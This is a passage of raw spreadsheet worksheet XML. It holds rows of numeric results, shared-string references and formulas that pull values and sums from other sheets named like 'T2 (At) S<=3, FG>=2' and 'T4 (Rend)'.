        <v>0.81449508002878346</v>
      </c>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19">
      <c r="A6" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B6" s="364">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$K$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="C6" s="364">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$Q$79</f>
        <v>0.46363636363636362</v>
      </c>
      <c r="D6" s="364">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$W$79</f>
        <v>0.8</v>
      </c>
      <c r="E6" s="364">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$AC$79</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="F6" s="364">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$AI$79</f>
        <v>1</v>
      </c>
      <c r="G6" s="364">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$AO$79</f>
        <v>1</v>
      </c>
      <c r="H6" s="364">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$AU$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="I6" s="364">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$BA$79</f>
        <v>0.50909090909090904</v>
      </c>
      <c r="J6" s="365">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$BG$79</f>
        <v>0.88181818181818183</v>
      </c>
      <c r="K6" s="455">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$BM$79</f>
        <v>0.5757575757575758</v>
      </c>
      <c r="L6" s="456">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$BT$79</f>
        <v>0.94848484848484849</v>
      </c>
      <c r="M6" s="450">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$BZ$79</f>
        <v>0.3</v>
      </c>
      <c r="N6" s="456">
        <f>'T2 (At) S&lt;=3, FG&gt;=2'!$CG$79</f>
        <v>0.66363636363636369</v>
      </c>
      <c r="O6" s="572"/>
      <c r="P6" s="572"/>
      <c r="Q6" s="572"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19">
      <c r="A7" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B7" s="281">
        <f t="shared" ref="B7:N7" si="0">SUM(B8,B9)</f>
        <v>8633811</v>
      </c>
      <c r="C7" s="281">
        <f t="shared" si="0"/>
        <v>5141847</v>
      </c>
      <c r="D7" s="281">
        <f t="shared" si="0"/>
        <v>13775658</v>
      </c>
      <c r="E7" s="281">
        <f t="shared" si="0"/>
        <v>13511987</v>
      </c>
      <c r="F7" s="281">
        <f t="shared" si="0"/>
        <v>13259420</v>
      </c>
      <c r="G7" s="281">
        <f t="shared" si="0"/>
        <v>26768282</v>
      </c>
      <c r="H7" s="281">
        <f t="shared" si="0"/>
        <v>6422</v>
      </c>
      <c r="I7" s="281">
        <f t="shared" si="0"/>
        <v>7513751</v>
      </c>
      <c r="J7" s="311">
        <f t="shared" si="0"/>
        <v>21283000</v>
      </c>
      <c r="K7" s="451">
        <f t="shared" si="0"/>
        <v>5059468</v>
      </c>
      <c r="L7" s="454">
        <f t="shared" si="0"/>
        <v>27632442</v>
      </c>
      <c r="M7" s="451">
        <f t="shared" si="0"/>
        <v>41932</v>
      </c>
      <c r="N7" s="454">
        <f t="shared" si="0"/>
        <v>2557775</v>
      </c>
      <c r="O7" s="572"/>
      <c r="P7" s="572"/>
      <c r="Q7" s="572"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="16.5" customHeight="1">
      <c r="A8" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B8" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!B9</f>
        <v>13523</v>
      </c>
      <c r="C8" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!C9</f>
        <v>4968</v>
      </c>
      <c r="D8" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!D9</f>
        <v>18491</v>
      </c>
      <c r="E8" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!E9</f>
        <v>383176</v>
      </c>
      <c r="F8" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!F9</f>
        <v>192858</v>
      </c>
      <c r="G8" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!G9</f>
        <v>572909</v>
      </c>
      <c r="H8" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!H9</f>
        <v>2</v>
      </c>
      <c r="I8" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!I9</f>
        <v>8207</v>
      </c>
      <c r="J8" s="311">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!J9</f>
        <v>26696</v>
      </c>
      <c r="K8" s="451">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!K9</f>
        <v>655807</v>
      </c>
      <c r="L8" s="454">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!L9</f>
        <v>1977311</v>
      </c>
      <c r="M8" s="449">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!M9</f>
        <v>19923</v>
      </c>
      <c r="N8" s="454">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!N9</f>
        <v>2508032</v>
      </c>
      <c r="O8" s="572"/>
      <c r="P8" s="572"/>
      <c r="Q8" s="572"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="12.2" customHeight="1">
      <c r="A9" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B9" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!B13</f>
        <v>8620288</v>
      </c>
      <c r="C9" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!C13</f>
        <v>5136879</v>
      </c>
      <c r="D9" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!D13</f>
        <v>13757167</v>
      </c>
      <c r="E9" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!E13</f>
        <v>13128811</v>
      </c>
      <c r="F9" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!F13</f>
        <v>13066562</v>
      </c>
      <c r="G9" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!G13</f>
        <v>26195373</v>
      </c>
      <c r="H9" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!H13</f>
        <v>6420</v>
      </c>
      <c r="I9" s="281">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!I13</f>
        <v>7505544</v>
      </c>
      <c r="J9" s="311">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!J13</f>
        <v>21256304</v>
      </c>
      <c r="K9" s="451">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!K13</f>
        <v>4403661</v>
      </c>
      <c r="L9" s="454">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!L13</f>
        <v>25655131</v>
      </c>
      <c r="M9" s="449">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!M13</f>
        <v>22009</v>
      </c>
      <c r="N9" s="454">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!N13</f>
        <v>49743</v>
      </c>
      <c r="O9" s="572"/>
      <c r="P9" s="572"/>
      <c r="Q9" s="572"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="16.5" customHeight="1" thickBot="1">
      <c r="A10" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B10" s="283">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!B18</f>
        <v>637.45381941876803</v>
      </c>
      <c r="C10" s="283">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!C18</f>
        <v>1033.9933574879226</v>
      </c>
      <c r="D10" s="283">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!D18</f>
        <v>743.99259099021151</v>
      </c>
      <c r="E10" s="283">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!E18</f>
        <v>34.263134956260309</v>
      </c>
      <c r="F10" s="283">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!F18</f>
        <v>67.752242582625556</v>
      </c>
      <c r="G10" s="283">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!G18</f>
        <v>45.723444735551368</v>
      </c>
      <c r="H10" s="283">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!H18</f>
        <v>3210</v>
      </c>
      <c r="I10" s="283">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!I18</f>
        <v>914.52954794687457</v>
      </c>
      <c r="J10" s="313">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!J18</f>
        <v>796.23554090500454</v>
      </c>
      <c r="K10" s="452">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!K18</f>
        <v>6.7148734307502052</v>
      </c>
      <c r="L10" s="457">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!L18</f>
        <v>12.97475763802457</v>
      </c>
      <c r="M10" s="453">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!M18</f>
        <v>1.104703106961803</v>
      </c>
      <c r="N10" s="457">
        <f>'T4 (Rend) S&lt;=3, FG&gt;=2'!N18</f>
        <v>1.9833478998673063E-2</v>
      </c>
      <c r="O10" s="572"/>
      <c r="P10" s="572"/>
      <c r="Q10" s="572"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A11" s="734" t="s">
        <v>4461</v>
      </c>
      <c r="B11" s="735"/>
      <c r="C11" s="735"/>
      <c r="D11" s="735"/>
      <c r="E11" s="735"/>
      <c r="F11" s="735"/>
      <c r="G11" s="735"/>
      <c r="H11" s="735"/>
      <c r="I11" s="735"/>
      <c r="J11" s="735"/>
      <c r="K11" s="735"/>
      <c r="L11" s="735"/>
      <c r="M11" s="735"/>
      <c r="N11" s="736"/>
      <c r="O11" s="572"/>
      <c r="P11" s="572"/>
      <c r="Q11" s="572"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="14.25" customHeight="1">
      <c r="A12" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B12" s="546">
        <v>0.343773</v>
      </c>
      <c r="C12" s="546">
        <v>0.66055699999999995</v>
      </c>
      <c r="D12" s="546">
        <v>0.68752500000000005</v>
      </c>
      <c r="E12" s="546">
        <v>0.80898300000000001</v>
      </c>
      <c r="F12" s="546">
        <v>0.85805500000000001</v>
      </c>
      <c r="G12" s="546">
        <v>0.91936700000000005</v>
      </c>
      <c r="H12" s="546">
        <v>9.5346E-2</v>
      </c>
      <c r="I12" s="546">
        <v>0.54771400000000003</v>
      </c>
      <c r="J12" s="547">
        <v>0.73233400000000004</v>
      </c>
      <c r="K12" s="548">
        <v>0.738541</v>
      </c>
      <c r="L12" s="549">
        <v>0.91943600000000003</v>
      </c>
      <c r="M12" s="550">
        <v>0.54772200000000004</v>
      </c>
      <c r="N12" s="549">
        <v>0.80903899999999995</v>
      </c>
      <c r="O12" s="214"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="36.75" customHeight="1">
      <c r="A13" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B13" s="260" t="s">
        <v>4307</v>
      </c>
      <c r="C13" s="260" t="s">
        <v>4467</v>
      </c>
      <c r="D13" s="260" t="s">
        <v>4468</v>
      </c>
      <c r="E13" s="260" t="s">
        <v>4543</v>
      </c>
      <c r="F13" s="260" t="s">
        <v>4544</v>
      </c>
      <c r="G13" s="260" t="s">
        <v>4545</v>
      </c>
      <c r="H13" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I13" s="260" t="s">
        <v>4546</v>
      </c>
      <c r="J13" s="312" t="s">
        <v>4547</v>
      </c>
      <c r="K13" s="436" t="s">
        <v>4754</v>
      </c>
      <c r="L13" s="437" t="s">
        <v>4824</v>
      </c>
      <c r="M13" s="315" t="s">
        <v>4755</v>
      </c>
      <c r="N13" s="437" t="s">
        <v>4825</v>
      </c>
      <c r="O13" s="262"/>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="25.5">
      <c r="A14" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B14" s="281">
        <v>12</v>
      </c>
      <c r="C14" s="281">
        <v>22</v>
      </c>
      <c r="D14" s="281">
        <v>34</v>
      </c>
      <c r="E14" s="281">
        <v>55</v>
      </c>
      <c r="F14" s="281">
        <v>58</v>
      </c>
      <c r="G14" s="281">
        <v>113</v>
      </c>
      <c r="H14" s="281">
        <v>1</v>
      </c>
      <c r="I14" s="281">
        <v>20</v>
      </c>
      <c r="J14" s="454">
        <v>53</v>
      </c>
      <c r="K14" s="449">
        <v>6</v>
      </c>
      <c r="L14" s="454">
        <v>80</v>
      </c>
      <c r="M14" s="449">
        <v>2</v>
      </c>
      <c r="N14" s="454">
        <v>6</v>
      </c>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19">
      <c r="A15" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B15" s="364">
        <v>0.1182</v>
      </c>
      <c r="C15" s="364">
        <v>0.43640000000000001</v>
      </c>
      <c r="D15" s="364">
        <v>0.47270000000000001</v>
      </c>
      <c r="E15" s="364">
        <v>0.65449999999999997</v>
      </c>
      <c r="F15" s="364">
        <v>0.73640000000000005</v>
      </c>
      <c r="G15" s="364">
        <v>0.84550000000000003</v>
      </c>
      <c r="H15" s="364">
        <v>9.1000000000000004E-3</v>
      </c>
      <c r="I15" s="364">
        <v>0.3</v>
      </c>
      <c r="J15" s="456">
        <v>0.53639999999999999</v>
      </c>
      <c r="K15" s="613" t="s">
        <v>4756</v>
      </c>
      <c r="L15" s="456" t="s">
        <v>4550</v>
      </c>
      <c r="M15" s="364" t="s">
        <v>4757</v>
      </c>
      <c r="N15" s="456" t="s">
        <v>4549</v>
      </c>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19">
      <c r="A16" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B16" s="281">
        <v>1449</v>
      </c>
      <c r="C16" s="281">
        <v>10347</v>
      </c>
      <c r="D16" s="281">
        <v>11796</v>
      </c>
      <c r="E16" s="281">
        <v>187011</v>
      </c>
      <c r="F16" s="281">
        <v>203930</v>
      </c>
      <c r="G16" s="281">
        <v>390874</v>
      </c>
      <c r="H16" s="281">
        <v>24</v>
      </c>
      <c r="I16" s="281">
        <v>10568</v>
      </c>
      <c r="J16" s="454">
        <v>22340</v>
      </c>
      <c r="K16" s="314">
        <f>K17+K18</f>
        <v>657505</v>
      </c>
      <c r="L16" s="314">
        <f t="shared" ref="L16:N16" si="1">L17+L18</f>
        <v>1152441</v>
      </c>
      <c r="M16" s="449">
        <f t="shared" si="1"/>
        <v>20030</v>
      </c>
      <c r="N16" s="458">
        <f t="shared" si="1"/>
        <v>2508173</v>
      </c>
      <c r="O16" s="572"/>
      <c r="P16" s="572"/>
      <c r="Q16" s="572"/>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:19">
      <c r="A17" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B17" s="281">
        <v>96</v>
      </c>
      <c r="C17" s="281">
        <v>4930</v>
      </c>
      <c r="D17" s="281">
        <v>5026</v>
      </c>
      <c r="E17" s="281">
        <v>175220</v>
      </c>
      <c r="F17" s="281">
        <v>191880</v>
      </c>
      <c r="G17" s="281">
        <v>367033</v>
      </c>
      <c r="H17" s="281">
        <v>1</v>
      </c>
      <c r="I17" s="281">
        <v>7927</v>
      </c>
      <c r="J17" s="454">
        <v>12952</v>
      </c>
      <c r="K17" s="314">
        <v>655780</v>
      </c>
      <c r="L17" s="454">
        <v>1143865</v>
      </c>
      <c r="M17" s="281">
        <v>19922</v>
      </c>
      <c r="N17" s="454">
        <v>2508021</v>
      </c>
      <c r="O17" s="572"/>
      <c r="P17" s="572"/>
      <c r="Q17" s="572"/>
      <c r="S17" s="214"/>
    </row>
    <row r="18" spans="1:19">
      <c r="A18" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B18" s="281">
        <v>1353</v>
      </c>
      <c r="C18" s="281">
        <v>5417</v>
      </c>
      <c r="D18" s="281">
        <v>6770</v>
      </c>
      <c r="E18" s="281">
        <v>11791</v>
      </c>
      <c r="F18" s="281">
        <v>12050</v>
      </c>
      <c r="G18" s="281">
        <v>23841</v>
      </c>
      <c r="H18" s="281">
        <v>23</v>
      </c>
      <c r="I18" s="281">
        <v>2641</v>
      </c>
      <c r="J18" s="454">
        <v>9388</v>
      </c>
      <c r="K18" s="314">
        <v>1725</v>
      </c>
      <c r="L18" s="454">
        <v>8576</v>
      </c>
      <c r="M18" s="281">
        <v>108</v>
      </c>
      <c r="N18" s="454">
        <v>152</v>
      </c>
      <c r="O18" s="572"/>
      <c r="P18" s="572"/>
      <c r="Q18" s="572"/>
      <c r="S18" s="214"/>
    </row>
    <row r="19" spans="1:19" ht="13.5" thickBot="1">
      <c r="A19" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B19" s="283">
        <v>14.09375</v>
      </c>
      <c r="C19" s="283">
        <v>1.0987829614604463</v>
      </c>
      <c r="D19" s="283">
        <v>1.3469956227616395</v>
      </c>
      <c r="E19" s="283">
        <v>6.7292546512955145E-2</v>
      </c>
      <c r="F19" s="283">
        <v>6.2799666458203049E-2</v>
      </c>
      <c r="G19" s="283">
        <v>6.4956012129699509E-2</v>
      </c>
      <c r="H19" s="283">
        <v>23</v>
      </c>
      <c r="I19" s="283">
        <v>0.33316513182792984</v>
      </c>
      <c r="J19" s="457">
        <v>0.72483014206300189</v>
      </c>
      <c r="K19" s="459">
        <v>2.8999999999999998E-3</v>
      </c>
      <c r="L19" s="457">
        <v>0.1181</v>
      </c>
      <c r="M19" s="459">
        <v>5.4000000000000003E-3</v>
      </c>
      <c r="N19" s="457">
        <v>0</v>
      </c>
      <c r="O19" s="572"/>
      <c r="P19" s="572"/>
      <c r="Q19" s="572"/>
      <c r="S19" s="214"/>
    </row>
    <row r="20" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A20" s="737" t="s">
        <v>4462</v>
      </c>
      <c r="B20" s="735"/>
      <c r="C20" s="735"/>
      <c r="D20" s="735"/>
      <c r="E20" s="735"/>
      <c r="F20" s="735"/>
      <c r="G20" s="735"/>
      <c r="H20" s="735"/>
      <c r="I20" s="735"/>
      <c r="J20" s="735"/>
      <c r="K20" s="735"/>
      <c r="L20" s="735"/>
      <c r="M20" s="735"/>
      <c r="N20" s="736"/>
      <c r="O20" s="572"/>
      <c r="P20" s="572"/>
      <c r="Q20" s="572"/>
      <c r="S20" s="214"/>
    </row>
    <row r="21" spans="1:19" ht="14.25" customHeight="1">
      <c r="A21" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B21" s="546">
        <v>0.343773</v>
      </c>
      <c r="C21" s="546">
        <v>0.66054400000000002</v>
      </c>
      <c r="D21" s="546">
        <v>0.68751099999999998</v>
      </c>
      <c r="E21" s="546">
        <v>0.80895700000000004</v>
      </c>
      <c r="F21" s="546">
        <v>0.86328899999999997</v>
      </c>
      <c r="G21" s="546">
        <v>0.91929700000000003</v>
      </c>
      <c r="H21" s="546">
        <v>9.5346E-2</v>
      </c>
      <c r="I21" s="546">
        <v>0.61048800000000003</v>
      </c>
      <c r="J21" s="547">
        <v>0.76863800000000004</v>
      </c>
      <c r="K21" s="548">
        <v>0.738541</v>
      </c>
      <c r="L21" s="549">
        <v>0.93897699999999995</v>
      </c>
      <c r="M21" s="550">
        <v>0.54771999999999998</v>
      </c>
      <c r="N21" s="549">
        <v>0.80903599999999998</v>
      </c>
      <c r="O21" s="214"/>
      <c r="S21" s="214"/>
    </row>
    <row r="22" spans="1:19" ht="36.75" customHeight="1">
      <c r="A22" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B22" s="260" t="s">
        <v>4307</v>
      </c>
      <c r="C22" s="260" t="s">
        <v>4469</v>
      </c>
      <c r="D22" s="260" t="s">
        <v>4470</v>
      </c>
      <c r="E22" s="260" t="s">
        <v>4553</v>
      </c>
      <c r="F22" s="260" t="s">
        <v>4554</v>
      </c>
      <c r="G22" s="260" t="s">
        <v>4555</v>
      </c>
      <c r="H22" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I22" s="260" t="s">
        <v>4556</v>
      </c>
      <c r="J22" s="437" t="s">
        <v>4557</v>
      </c>
      <c r="K22" s="315" t="s">
        <v>4754</v>
      </c>
      <c r="L22" s="437" t="s">
        <v>4826</v>
      </c>
      <c r="M22" s="315" t="s">
        <v>4759</v>
      </c>
      <c r="N22" s="437" t="s">
        <v>4827</v>
      </c>
      <c r="O22" s="262"/>
      <c r="S22" s="214"/>
    </row>
    <row r="23" spans="1:19" ht="25.5">
      <c r="A23" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B23" s="281">
        <v>12</v>
      </c>
      <c r="C23" s="281">
        <v>18</v>
      </c>
      <c r="D23" s="281">
        <v>30</v>
      </c>
      <c r="E23" s="281">
        <v>46</v>
      </c>
      <c r="F23" s="281">
        <v>46</v>
      </c>
      <c r="G23" s="281">
        <v>92</v>
      </c>
      <c r="H23" s="281">
        <v>1</v>
      </c>
      <c r="I23" s="281">
        <v>13</v>
      </c>
      <c r="J23" s="454">
        <v>42</v>
      </c>
      <c r="K23" s="314">
        <v>6</v>
      </c>
      <c r="L23" s="454">
        <v>74</v>
      </c>
      <c r="M23" s="281">
        <v>1</v>
      </c>
      <c r="N23" s="454">
        <v>4</v>
      </c>
      <c r="S23" s="214"/>
    </row>
    <row r="24" spans="1:19">
      <c r="A24" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B24" s="364">
        <v>0.1182</v>
      </c>
      <c r="C24" s="364" t="s">
        <v>4305</v>
      </c>
      <c r="D24" s="364" t="s">
        <v>4306</v>
      </c>
      <c r="E24" s="364" t="s">
        <v>4549</v>
      </c>
      <c r="F24" s="364" t="s">
        <v>4559</v>
      </c>
      <c r="G24" s="364" t="s">
        <v>4550</v>
      </c>
      <c r="H24" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I24" s="364" t="s">
        <v>4308</v>
      </c>
      <c r="J24" s="456" t="s">
        <v>4309</v>
      </c>
      <c r="K24" s="613" t="s">
        <v>4756</v>
      </c>
      <c r="L24" s="456" t="s">
        <v>4560</v>
      </c>
      <c r="M24" s="364" t="s">
        <v>4757</v>
      </c>
      <c r="N24" s="456" t="s">
        <v>4549</v>
      </c>
      <c r="S24" s="214"/>
    </row>
    <row r="25" spans="1:19">
      <c r="A25" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B25" s="281">
        <v>1449</v>
      </c>
      <c r="C25" s="281">
        <v>13670</v>
      </c>
      <c r="D25" s="281">
        <v>15119</v>
      </c>
      <c r="E25" s="281">
        <v>193984</v>
      </c>
      <c r="F25" s="281">
        <v>212587</v>
      </c>
      <c r="G25" s="281">
        <v>406504</v>
      </c>
      <c r="H25" s="281">
        <v>24</v>
      </c>
      <c r="I25" s="281">
        <v>15273</v>
      </c>
      <c r="J25" s="454">
        <v>30368</v>
      </c>
      <c r="K25" s="314">
        <f>K26+K27</f>
        <v>657505</v>
      </c>
      <c r="L25" s="314">
        <f t="shared" ref="L25" si="2">L26+L27</f>
        <v>1156712</v>
      </c>
      <c r="M25" s="449">
        <f t="shared" ref="M25" si="3">M26+M27</f>
        <v>20555</v>
      </c>
      <c r="N25" s="458">
        <f t="shared" ref="N25" si="4">N26+N27</f>
        <v>2509223</v>
      </c>
      <c r="O25" s="572"/>
      <c r="P25" s="572"/>
      <c r="Q25" s="572"/>
      <c r="S25" s="214"/>
    </row>
    <row r="26" spans="1:19">
      <c r="A26" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B26" s="281">
        <v>96</v>
      </c>
      <c r="C26" s="281">
        <v>4934</v>
      </c>
      <c r="D26" s="281">
        <v>5030</v>
      </c>
      <c r="E26" s="281">
        <v>175327</v>
      </c>
      <c r="F26" s="281">
        <v>191896</v>
      </c>
      <c r="G26" s="281">
        <v>367156</v>
      </c>
      <c r="H26" s="281">
        <v>1</v>
      </c>
      <c r="I26" s="281">
        <v>8140</v>
      </c>
      <c r="J26" s="454">
        <v>13169</v>
      </c>
      <c r="K26" s="314">
        <v>655780</v>
      </c>
      <c r="L26" s="454">
        <v>1143884</v>
      </c>
      <c r="M26" s="281">
        <v>19923</v>
      </c>
      <c r="N26" s="454">
        <v>2508023</v>
      </c>
      <c r="O26" s="572"/>
      <c r="P26" s="572"/>
      <c r="Q26" s="572"/>
      <c r="S26" s="214"/>
    </row>
    <row r="27" spans="1:19">
      <c r="A27" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B27" s="281">
        <v>1353</v>
      </c>
      <c r="C27" s="281">
        <v>8736</v>
      </c>
      <c r="D27" s="281">
        <v>10089</v>
      </c>
      <c r="E27" s="281">
        <v>18657</v>
      </c>
      <c r="F27" s="281">
        <v>20691</v>
      </c>
      <c r="G27" s="281">
        <v>39348</v>
      </c>
      <c r="H27" s="281">
        <v>23</v>
      </c>
      <c r="I27" s="281">
        <v>7133</v>
      </c>
      <c r="J27" s="458">
        <v>17199</v>
      </c>
      <c r="K27" s="314">
        <v>1725</v>
      </c>
      <c r="L27" s="454">
        <v>12828</v>
      </c>
      <c r="M27" s="281">
        <v>632</v>
      </c>
      <c r="N27" s="454">
        <v>1200</v>
      </c>
      <c r="O27" s="572"/>
      <c r="P27" s="572"/>
      <c r="Q27" s="572"/>
      <c r="S27" s="214"/>
    </row>
    <row r="28" spans="1:19" ht="13.5" thickBot="1">
      <c r="A28" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B28" s="283">
        <v>14.09375</v>
      </c>
      <c r="C28" s="283">
        <v>1.7705715443858938</v>
      </c>
      <c r="D28" s="283">
        <v>2.005765407554672</v>
      </c>
      <c r="E28" s="283">
        <v>0.10641258904789337</v>
      </c>
      <c r="F28" s="283">
        <v>0.10782402968274482</v>
      </c>
      <c r="G28" s="283">
        <v>0.10716970443081415</v>
      </c>
      <c r="H28" s="283">
        <v>23</v>
      </c>
      <c r="I28" s="283">
        <v>0.8762899262899263</v>
      </c>
      <c r="J28" s="283">
        <v>1.3060217176702862</v>
      </c>
      <c r="K28" s="368">
        <v>2.8999999999999998E-3</v>
      </c>
      <c r="L28" s="457">
        <v>0.1956</v>
      </c>
      <c r="M28" s="459">
        <v>3.1600000000000003E-2</v>
      </c>
      <c r="N28" s="457">
        <v>2.0000000000000001E-4</v>
      </c>
      <c r="O28" s="572"/>
      <c r="P28" s="572"/>
      <c r="Q28" s="572"/>
      <c r="S28" s="214"/>
    </row>
    <row r="29" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A29" s="734" t="s">
        <v>4473</v>
      </c>
      <c r="B29" s="735"/>
      <c r="C29" s="735"/>
      <c r="D29" s="735"/>
      <c r="E29" s="735"/>
      <c r="F29" s="735"/>
      <c r="G29" s="735"/>
      <c r="H29" s="735"/>
      <c r="I29" s="735"/>
      <c r="J29" s="735"/>
      <c r="K29" s="735"/>
      <c r="L29" s="735"/>
      <c r="M29" s="735"/>
      <c r="N29" s="736"/>
      <c r="O29" s="572"/>
      <c r="P29" s="572"/>
      <c r="Q29" s="572"/>
      <c r="S29" s="214"/>
    </row>
    <row r="30" spans="1:19" ht="14.25" customHeight="1">
      <c r="A30" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B30" s="546">
        <v>0.83422700000000005</v>
      </c>
      <c r="C30" s="546">
        <v>0.66202499999999997</v>
      </c>
      <c r="D30" s="546">
        <v>0.85246699999999997</v>
      </c>
      <c r="E30" s="546">
        <v>0.92910599999999999</v>
      </c>
      <c r="F30" s="546">
        <v>0.96182199999999995</v>
      </c>
      <c r="G30" s="546">
        <v>0.93877699999999997</v>
      </c>
      <c r="H30" s="546">
        <v>9.5341999999999996E-2</v>
      </c>
      <c r="I30" s="546">
        <v>0.680558</v>
      </c>
      <c r="J30" s="547">
        <v>0.87237500000000001</v>
      </c>
      <c r="K30" s="548">
        <v>0.74115699999999995</v>
      </c>
      <c r="L30" s="549">
        <v>0.86384000000000005</v>
      </c>
      <c r="M30" s="550">
        <v>0.54771999999999998</v>
      </c>
      <c r="N30" s="549">
        <v>0.81462299999999999</v>
      </c>
      <c r="O30" s="214" t="s">
        <v>2311</v>
      </c>
      <c r="S30" s="214"/>
    </row>
    <row r="31" spans="1:19" ht="36.75" customHeight="1">
      <c r="A31" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B31" s="260" t="s">
        <v>4310</v>
      </c>
      <c r="C31" s="260" t="s">
        <v>4561</v>
      </c>
      <c r="D31" s="260" t="s">
        <v>4562</v>
      </c>
      <c r="E31" s="260" t="s">
        <v>4563</v>
      </c>
      <c r="F31" s="260" t="s">
        <v>4564</v>
      </c>
      <c r="G31" s="260" t="s">
        <v>4565</v>
      </c>
      <c r="H31" s="260" t="s">
        <v>4129</v>
      </c>
      <c r="I31" s="260" t="s">
        <v>4311</v>
      </c>
      <c r="J31" s="312" t="s">
        <v>4566</v>
      </c>
      <c r="K31" s="436" t="s">
        <v>4760</v>
      </c>
      <c r="L31" s="437" t="s">
        <v>4828</v>
      </c>
      <c r="M31" s="315" t="s">
        <v>4761</v>
      </c>
      <c r="N31" s="437" t="s">
        <v>4829</v>
      </c>
      <c r="O31" s="262" t="s">
        <v>1765</v>
      </c>
      <c r="S31" s="214"/>
    </row>
    <row r="32" spans="1:19" ht="25.5">
      <c r="A32" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B32" s="281">
        <v>5</v>
      </c>
      <c r="C32" s="281">
        <v>55</v>
